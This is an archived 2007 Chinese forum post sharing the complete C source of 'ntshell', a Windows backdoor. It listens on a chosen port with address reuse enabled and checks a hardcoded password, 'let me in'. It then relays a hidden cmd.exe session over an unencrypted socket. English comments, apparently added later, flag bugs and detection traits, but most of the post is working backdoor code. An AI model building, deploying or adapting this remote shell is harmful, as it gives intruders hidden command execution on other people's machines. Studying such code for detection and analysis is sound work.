
猪猪 发表于 2007-2-13 09:44

ntshell的核心源代码

信息来源:dahubaobao

[b]端口复用相关资料[/b]
[code]//ntshell的核心代码
#include
#include
#include
#include
#include

// Size in bytes of the `data` relay buffer declared in shell(); also used as
// the length argument of the recv() and PeekNamedPipe() calls there.
#define buflen 2000
// Not referenced anywhere in the visible listing.
#define shellsize 2000
// Forward declaration of the listener/relay routine defined after main().
void shell();
// TCP port to listen on: written by main() from argv[1], read by shell().
u_int port;
// Scratch global that receives the EBP register value in main().
long i;

// Entry point: parses the listen port from argv[1], initialises Winsock and
// hands control to shell(), which implements a password-gated remote command
// shell. Returns 0 on every path, including Winsock start-up failure.
int main(int argc, char *argv[])
{
  int *ret;
  // MSVC x86 inline assembly: copies the frame pointer (EBP) into the global i.
  _asm mov i,ebp
  // The cast binds before the +1, so ret is one int above the address held in
  // EBP -- the return-address slot on a conventional x86 frame (original note:
  // "ret-->return address"). ret is never read again in this listing.
  ret=(int*)i+1;    //ret-->return address


  // Print a description and usage text, then exit, when no port argument is given.
  if(argc<2)
  {
    puts(" This program built a listen port(u specify), and worked as a telnet server");
    // NOTE(review): nothing follows %s in the usage line; an angle-bracketed
    // placeholder may have been stripped when the page was archived -- confirm.
    printf("\n  USAGE:\n\t%s \n", argv[0]);
    puts("\t listenport: specify the (port) number to (listen)");
    exit(0);
  }
  // atoi() yields 0 for non-numeric input. port is unsigned (u_int), so the
  // test below is true only for 0, in which case the telnet port 23 is used.
  port=atoi(argv[1]);
  if(port<=0)port=23;

  // Request Winsock version 1.1; a non-zero return means start-up failed.
  WSAData wsa;
  if(WSAStartup(MAKEWORD(1,1),&wsa))
  {puts(" Error to start up winsock!");return 0;}
  
  // shell() returns only when the session ends or one of its checked calls fails.
  shell();
  WSACleanup();
  return 0;
}


// Listens on the global `port`, accepts connections until one sends a packet
// that starts with a fixed password, then relays bytes between that socket and
// a hidden cmd.exe child process through two anonymous pipes.
//
// Defender notes (all visible in the code below):
//  - the session is unencrypted and the password is a constant string compared
//    against the first bytes the client sends, so it appears verbatim on the wire;
//  - the child is cmd.exe started with SW_HIDE and redirected standard handles,
//    parented by a process that owns a listening TCP socket;
//  - the listener sets SO_REUSEADDR before bind(); services that must not share
//    their port can set SO_EXCLUSIVEADDRUSE on their own listening socket.
void shell()
{
  SOCKET lsts,cons;
  // lsts: listening socket; cons: the accepted client connection.
  lsts=socket(AF_INET, SOCK_STREAM, 0);
  if(lsts==INVALID_SOCKET)
  {puts(" Create socket error!");return;}
  int val=1;
  char buff[100], data[buflen];
  hostent *host;
  u_long ip;
  sockaddr_in locsin;
  // Enable address reuse on the listener (return value not checked).
  setsockopt(lsts, SOL_SOCKET, SO_REUSEADDR, (char*)&val, sizeof(val));
  
  // Resolve this machine's own name and use its first listed address as the
  // bind address instead of the wildcard address.
  gethostname(buff,80);
  host=gethostbyname(buff);
  if(host==0)
  {puts(" Get host error!");return;}
  // Copies h_length bytes into a u_long; presumably 4 bytes (IPv4) -- not checked.
  memcpy(&ip, host->h_addr_list[0], host->h_length);
  memset(&locsin,0,sizeof(locsin));
  locsin.sin_addr.S_un.S_addr =ip;
  locsin.sin_family = AF_INET;
  locsin.sin_port = htons(port);

  // NOTE(review): the results of bind() and listen() are not checked; a failure
  // only shows up later as an accept() error.
  bind(lsts, (sockaddr*)&locsin, sizeof(locsin));
  listen(lsts,3);
  int links=0;
  char passwd[]="let me in";
  // Password gate: accept up to 100 connections, doing one recv() on each and
  // comparing the first strlen(passwd) bytes of the buffer with passwd.
  do{
    val=sizeof(locsin);
    cons=accept(lsts, (sockaddr*)&locsin,&val);
    if(cons==INVALID_SOCKET)
    {
      val=(int)GetLastError();
      printf(" accept error, error code:'%d' !",val);
      return;
    }
    // NOTE(review): the byte count returned here is overwritten without being
    // checked, so the memcmp below can read bytes this recv() did not write.
    // Connections that fail the comparison are not closed.
    val=recv(cons, data, buflen, 0);
  }while(memcmp(data, passwd, strlen(passwd))!=0 && ++links<100);
  // Give up after 100 failed attempts (lsts and cons are left open).
  if(links>=100)return;
// Original author's note: only a single packet is awaited, not a CR-LF
// terminated line, so the password must arrive in one send; the default
// Windows telnet client is therefore said not to work.
  
  // Two anonymous pipes: rp1/wp1 carry the child's output back to this process,
  // rp2/wp2 carry client input to the child. All four handles are created
  // inheritable. CreatePipe() results are not checked.
  HANDLE rp1, wp1, rp2, wp2;
  SECURITY_ATTRIBUTES sa;
  sa.nLength = sizeof(sa);
  sa.lpSecurityDescriptor = 0;
  sa.bInheritHandle = 1;
  CreatePipe(&rp1, &wp1, &sa, 0);
  CreatePipe(&rp2, &wp2, &sa, 0);

  STARTUPINFO si;
  PROCESS_INFORMATION pi;
  
  // Child stdout and stderr go to wp1, stdin comes from rp2, window is hidden.
  memset(&si,0,sizeof(si));
  si.hStdError = si.hStdOutput = wp1;
  si.hStdInput = rp2;
  si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
  si.wShowWindow = SW_HIDE;
  si.lpReserved=0;
  si.lpReserved2=0;
  si.cbReserved2 =0;
  si.cb = sizeof(si);
  // Original note: "this two must not exchange".
  // NOTE(review): it is not clear from the listing which two statements are meant.
  // "cmd.exe" is given without a path, and bInheritHandles is 1, so the child
  // receives the inheritable pipe handles created above.
  if(!CreateProcess(0, "cmd.exe", 0, 0, 1, 0, 0, 0, &si, &pi))
  {
    val=(int)GetLastError();
    printf(" create cmd.exe process error, error code %d !",val);
    return;
  }
  // Close this process's copies of the two pipe ends assigned to the child.
  // pi.hProcess and pi.hThread are never closed in this listing.
  CloseHandle(rp2);CloseHandle(wp1);

  // num: bytes transferred by the last pipe call, or 0xffffffff as an error
  // marker; use: total bytes PeekNamedPipe reports as available.
  u_long num, use;
  // Relay loop: drain child output to the client, then block for client input
  // and forward it to the child's stdin.
  while(1)
  {
    while(1)//bytes in pipe
    {
      // Non-zero return means the peek succeeded; otherwise flag an error.
      if(!PeekNamedPipe(rp1, data, buflen, &num, &use, 0))
      {num=0xffffffff;break;}//return TRUE is OK
      // NOTE(review): `use` is the total available in the pipe and is passed as
      // the read length, so it is not bounded by buflen, the size of data.
      if(use && !ReadFile(rp1, data, use, &num, 0))
      {num=0xffffffff;break;}//return 0 if error, close
      // Forward what was read to the client (send() result not checked).
      if(num)send(cons, data, num, 0);
      Sleep(100);
      // Nothing was pending on this pass: stop draining and wait for input.
      if(!use)break;
    }
    // Pipe error: leave the relay loop (sockets and child are not cleaned up here).
    if(num==0xffffffff)break;
    val=recv(cons, data, buflen ,0);
    // 0 means the client closed the connection; SOCKET_ERROR means recv failed.
    if(val==0||val==SOCKET_ERROR)
    {
      puts(" Write to client error! Client may close!");
      TerminateProcess(pi.hProcess, 0);
      closesocket(cons);
      closesocket(lsts);
      break;
    }
    // Pass the received bytes to the child's stdin (result not checked).
    WriteFile(wp2, data, val, &num, 0);
    Sleep(100);
  }

  return;
}[/code]

collren 发表于 2007-10-7 12:33

看了就要顶
